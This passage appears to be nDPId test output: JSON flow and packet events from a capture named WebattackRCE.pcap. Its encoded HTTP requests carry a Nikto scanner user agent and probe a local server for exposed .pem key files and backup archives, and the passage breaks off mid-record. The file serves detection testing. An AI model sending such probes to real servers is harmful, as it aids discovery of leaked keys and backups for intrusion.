+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1576420277079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277079,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DWxAAEAGLs1\/AAABfwAAAcOYH5CSvzUdCWfTlYAYAED+sQAAAQEICp1m\/H+dZvx\/R0VUIC8xLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1576420277081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277081,"pkt":"AAAAAAAAAAAAAAAACABFAADDZbZAAEAG1nx\/AAABfwAAAcOaH5Ap5V3Dc4s2n4AYAED+twAAAQEICp1m\/IGdZvyBR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1576420277083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277083,"pkt":"AAAAAAAAAAAAAAAACABFAADDEYFAAEAGKrJ\/AAABfwAAAcOcH5DxxikK7qXr+IAYAED+twAAAQEICp1m\/IOdZvyCR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1576420277084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277084,"pkt":"AAAAAAAAAAAAAAAACABFAADFEhNAAEAGKh5\/AAABfwAAAcOeH5AvZipnVfZObIAYAED+uQAAAQEICp1m\/ISdZvyER0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1576420277086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277086,"pkt":"AAAAAAAAAAAAAAAACABFAADF4EhAAEAGW+h\/AAABfwAAAcOgH5AMu9gyVttcv4AYAED+uQAAAQEICp1m\/IadZvyGR0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1576420277087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277087,"pkt":"AAAAAAAAAAAAAAAACABFAADFByZAAEAGNQt\/AAABfwAAAcOiH5Ca4D9dxFiRCIAYAED+uQAAAQEICp1m\/IedZvyHR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1576420277089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277089,"pkt":"AAAAAAAAAAAAAAAACABFAADFHRdAAEAGHxp\/AAABfwAAAcOkH5BFAiVuc2g7y4AYAED+uQAAAQEICp1m\/ImdZvyJR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1576420277090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277090,"pkt":"AAAAAAAAAAAAAAAACABFAADCB4tAAEAGNKl\/AAABfwAAAcOmH5BcnD\/ywDswlIAYAED+tgAAAQEICp1m\/IqdZvyKR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1576420277091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277091,"pkt":"AAAAAAAAAAAAAAAACABFAADCHJtAAEAGH5l\/AAABfwAAAcOoH5BLfyTh3iqQcIAYAED+tgAAAQEICp1m\/IudZvyLR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1576420277093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277093,"pkt":"AAAAAAAAAAAAAAAACABFAADCo9lAAEAGmFp\/AAABfwAAAcOqH5B0iJuvJFRwg4AYAED+tgAAAQEICp1m\/IydZvyMR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1576420277094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277094,"pkt":"AAAAAAAAAAAAAAAACABFAADCBM1AAEAGN2d\/AAABfwAAAcOsH5CyHDyzBNbaOYAYAED+tgAAAQEICp1m\/I6dZvyOR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 